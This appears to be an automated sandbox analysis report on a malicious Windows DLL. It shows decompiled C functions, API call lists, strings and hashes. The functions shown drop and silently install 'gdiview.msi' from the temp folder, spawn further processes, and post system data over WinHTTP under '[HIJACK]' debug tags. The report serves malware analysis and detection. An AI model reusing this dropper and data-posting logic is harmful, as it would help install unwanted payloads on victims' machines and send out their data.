				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}























                                                                                                                                                                          0x10022760
                                                                                                                                                                          0x10022760
                                                                                                                                                                          0x10022760
                                                                                                                                                                          0x10022760
                                                                                                                                                                          0x10022763
                                                                                                                                                                          0x10022765
                                                                                                                                                                          0x10022770
                                                                                                                                                                          0x10022771
                                                                                                                                                                          0x1002277e
                                                                                                                                                                          0x1002278b
                                                                                                                                                                          0x1002278c
                                                                                                                                                                          0x1002278e
                                                                                                                                                                          0x10022798
                                                                                                                                                                          0x100227a4
                                                                                                                                                                          0x100227b8
                                                                                                                                                                          0x100227bf
                                                                                                                                                                          0x100227c7
                                                                                                                                                                          0x100227dd
                                                                                                                                                                          0x100227e9
                                                                                                                                                                          0x100227ef
                                                                                                                                                                          0x100227fd
                                                                                                                                                                          0x10022802
                                                                                                                                                                          0x1002280c
                                                                                                                                                                          0x10022819
                                                                                                                                                                          0x1002281e
                                                                                                                                                                          0x10022831
                                                                                                                                                                          0x1002283d
                                                                                                                                                                          0x10022843
                                                                                                                                                                          0x10022851
                                                                                                                                                                          0x10022856
                                                                                                                                                                          0x10022860
                                                                                                                                                                          0x1002286d
                                                                                                                                                                          0x1002286e
                                                                                                                                                                          0x10022870
                                                                                                                                                                          0x10022886
                                                                                                                                                                          0x10022896
                                                                                                                                                                          0x1002289b
                                                                                                                                                                          0x100228a7
                                                                                                                                                                          0x100228ac
                                                                                                                                                                          0x100228c7
                                                                                                                                                                          0x100228d0
                                                                                                                                                                          0x100228eb
                                                                                                                                                                          0x100228f6
                                                                                                                                                                          0x100228f7
                                                                                                                                                                          0x10022906
                                                                                                                                                                          0x10022914
                                                                                                                                                                          0x1002291a
                                                                                                                                                                          0x10022921
                                                                                                                                                                          0x10022926
                                                                                                                                                                          0x1002292d
                                                                                                                                                                          0x10022932
                                                                                                                                                                          0x10022939
                                                                                                                                                                          0x1002293e
                                                                                                                                                                          0x10022948
                                                                                                                                                                          0x10022953
                                                                                                                                                                          0x1002295d

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                                            • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                                            • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                                            • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                                            • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                                            • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                                            • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                                            • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                                            • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                                            • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                                          • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                                            • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                                            • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                                          • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                          • API String ID: 728604215-152146038
                                                                                                                                                                          • Opcode ID: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                                          • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                                          • Opcode Fuzzy Hash: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                                          • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x10026888, 0x39e00); // executed
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A1D0(_t38,  &_v1028); // executed
					return _t22;
				}
				return _t21;
			}









                                                                                                                                                                          0x1001fc70
                                                                                                                                                                          0x1001fc79
                                                                                                                                                                          0x1001fc8e
                                                                                                                                                                          0x1001fc96
                                                                                                                                                                          0x1001fcab
                                                                                                                                                                          0x1001fcbf
                                                                                                                                                                          0x1001fcd6
                                                                                                                                                                          0x1001fcf1
                                                                                                                                                                          0x1001fd0a
                                                                                                                                                                          0x1001fd19
                                                                                                                                                                          0x1001fd1f
                                                                                                                                                                          0x1001fd21
                                                                                                                                                                          0x1001fd2a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001fd2f
                                                                                                                                                                          0x1001fd35

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                                            • Part of subcall function 1001FC10: CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                                            • Part of subcall function 1001FC10: WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                                            • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD19
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                            • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                          • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                          • API String ID: 1459467440-729886463
                                                                                                                                                                          • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                          • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                          • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10020575, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                          			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t20;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FDB0(); // executed
				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "installp2", "-0.3", "45.0.0", "exe"); // executed
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E10020180(__ebx, __edi, __esi, _t62); // executed
				_t52 = _t51 + 0x1c;
				_t20 = PathFileExistsA("C:\\hijack"); // executed
				if(_t20 != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E10020180(_t36, _t44, _t45, __eflags); // executed
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp2");
					E1001FEA0(_t36, _t44, _t45, __eflags); // executed
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp2");
					E1001FDC0(_t36, _t44, _t45, __eflags); // executed
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E10020180(_t36, _t44, _t45, __eflags); // executed
				} else {
					E1001A0A0(); // executed
					_t33 = E1001A0B0(_t37); // executed
					if(_t33 == 0 || E10019D10() != 0) {
					} else {
						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260(); // executed
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}














                                                                                                                                                                          0x10020575
                                                                                                                                                                          0x10020575
                                                                                                                                                                          0x10020575
                                                                                                                                                                          0x10020575
                                                                                                                                                                          0x10020644
                                                                                                                                                                          0x10020662
                                                                                                                                                                          0x1002066a
                                                                                                                                                                          0x1002066d
                                                                                                                                                                          0x1002066f
                                                                                                                                                                          0x1002067f
                                                                                                                                                                          0x10020685
                                                                                                                                                                          0x1002068a
                                                                                                                                                                          0x10020692
                                                                                                                                                                          0x1002069a
                                                                                                                                                                          0x100206d0
                                                                                                                                                                          0x100206d0
                                                                                                                                                                          0x100206d5
                                                                                                                                                                          0x100206e5
                                                                                                                                                                          0x100206eb
                                                                                                                                                                          0x100206f3
                                                                                                                                                                          0x100206f8
                                                                                                                                                                          0x10020708
                                                                                                                                                                          0x1002070e
                                                                                                                                                                          0x10020716
                                                                                                                                                                          0x1002071b
                                                                                                                                                                          0x1002072b
                                                                                                                                                                          0x10020731
                                                                                                                                                                          0x10020739
                                                                                                                                                                          0x1002073e
                                                                                                                                                                          0x1002074e
                                                                                                                                                                          0x10020754
                                                                                                                                                                          0x1002069c
                                                                                                                                                                          0x1002069c
                                                                                                                                                                          0x100206a1
                                                                                                                                                                          0x100206a8
                                                                                                                                                                          0x100206b8
                                                                                                                                                                          0x100206bf
                                                                                                                                                                          0x100206c4
                                                                                                                                                                          0x100206c7
                                                                                                                                                                          0x100206c9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100206cb
                                                                                                                                                                          0x100206c9
                                                                                                                                                                          0x100206a8
                                                                                                                                                                          0x1002075c
                                                                                                                                                                          0x10020761
                                                                                                                                                                          0x1002076b
                                                                                                                                                                          0x10020775
                                                                                                                                                                          0x1002077a
                                                                                                                                                                          0x10020783
                                                                                                                                                                          0x1002078e

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(C:\hijack), ref: 10020692
                                                                                                                                                                            • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                          • String ID: -0.3$45.0.0$C:\hijack$exe$install$installp2$status=main_start
                                                                                                                                                                          • API String ID: 482051434-254430877
                                                                                                                                                                          • Opcode ID: 893b3059632501a4e8b008769275d464316cd47a877e48c170e5124c6c6ed629
                                                                                                                                                                          • Instruction ID: 180e9a89bd69158387d9cbec8d9a940dcb427d9c64843ce9222d1c9730998d87
                                                                                                                                                                          • Opcode Fuzzy Hash: 893b3059632501a4e8b008769275d464316cd47a877e48c170e5124c6c6ed629
                                                                                                                                                                          • Instruction Fuzzy Hash: AE01D178E483185FD750EFA49C4A7DE77B2DF50254F9001A8FD08A6243EB31B6908EA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
					_t38 = E1001D7E0(_t68,  &_v548); // executed
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                                          0x1001dc00
                                                                                                                                                                          0x1001dc00
                                                                                                                                                                          0x1001dc00
                                                                                                                                                                          0x1001dc0d
                                                                                                                                                                          0x1001ddb4
                                                                                                                                                                          0x1001ddb4
                                                                                                                                                                          0x1001dc13
                                                                                                                                                                          0x1001dc28
                                                                                                                                                                          0x1001dc30
                                                                                                                                                                          0x1001dc3e
                                                                                                                                                                          0x1001dc45
                                                                                                                                                                          0x1001dc54
                                                                                                                                                                          0x1001dc5b
                                                                                                                                                                          0x1001dc60
                                                                                                                                                                          0x1001dc63
                                                                                                                                                                          0x1001dc74
                                                                                                                                                                          0x1001dc81
                                                                                                                                                                          0x1001dcd9
                                                                                                                                                                          0x1001dcde
                                                                                                                                                                          0x1001dce1
                                                                                                                                                                          0x1001dce3
                                                                                                                                                                          0x1001dd1e
                                                                                                                                                                          0x1001dd25
                                                                                                                                                                          0x1001dd39
                                                                                                                                                                          0x1001dd40
                                                                                                                                                                          0x1001dd45
                                                                                                                                                                          0x1001dd48
                                                                                                                                                                          0x1001dd4a
                                                                                                                                                                          0x1001dd5f
                                                                                                                                                                          0x1001dd5f
                                                                                                                                                                          0x1001dd6d
                                                                                                                                                                          0x1001dd72
                                                                                                                                                                          0x1001dd72
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dd4a
                                                                                                                                                                          0x1001dcec
                                                                                                                                                                          0x1001dcf1
                                                                                                                                                                          0x1001dcf4
                                                                                                                                                                          0x1001dcf6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dcf8
                                                                                                                                                                          0x1001dcff
                                                                                                                                                                          0x1001dd04
                                                                                                                                                                          0x1001dd07
                                                                                                                                                                          0x1001dd09
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dd0b
                                                                                                                                                                          0x1001dd12
                                                                                                                                                                          0x1001dd17
                                                                                                                                                                          0x1001dd1a
                                                                                                                                                                          0x1001dd1c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dc95
                                                                                                                                                                          0x1001dc9c
                                                                                                                                                                          0x1001dca1
                                                                                                                                                                          0x1001dca4
                                                                                                                                                                          0x1001dca6
                                                                                                                                                                          0x1001dca8
                                                                                                                                                                          0x1001dcaf
                                                                                                                                                                          0x1001dcc5
                                                                                                                                                                          0x1001dcca
                                                                                                                                                                          0x1001dcca
                                                                                                                                                                          0x1001dd75
                                                                                                                                                                          0x1001dd7e
                                                                                                                                                                          0x1001dd80
                                                                                                                                                                          0x1001dd91
                                                                                                                                                                          0x1001dd96
                                                                                                                                                                          0x1001dd96
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001ddae

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                                          • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                                          • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                                          • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                                            • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                                            • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                                            • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                                            • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                                            • Part of subcall function 1001DA70: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                                            • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                                            • Part of subcall function 1001DA70: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                                            • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                                            • Part of subcall function 1001DA70: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                                            • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                          • String ID: Mid2Failed
                                                                                                                                                                          • API String ID: 3782552391-1001836097
                                                                                                                                                                          • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                                          • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                                          • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                          			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022AF1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                                          0x1001fea0
                                                                                                                                                                          0x1001fea0
                                                                                                                                                                          0x1001fea3
                                                                                                                                                                          0x1001fea5
                                                                                                                                                                          0x1001feb0
                                                                                                                                                                          0x1001feb1
                                                                                                                                                                          0x1001febe
                                                                                                                                                                          0x1001fec5
                                                                                                                                                                          0x1001feda
                                                                                                                                                                          0x1001fee2
                                                                                                                                                                          0x1001fef7
                                                                                                                                                                          0x1001ff03
                                                                                                                                                                          0x1001ff17
                                                                                                                                                                          0x1001ff25
                                                                                                                                                                          0x1001ff26
                                                                                                                                                                          0x1001ff33
                                                                                                                                                                          0x1001ff47
                                                                                                                                                                          0x1001ff56
                                                                                                                                                                          0x1001ff61
                                                                                                                                                                          0x1001ff66
                                                                                                                                                                          0x1001ff70
                                                                                                                                                                          0x1001ff78
                                                                                                                                                                          0x1001ff82

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                                            • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                            • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                            • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
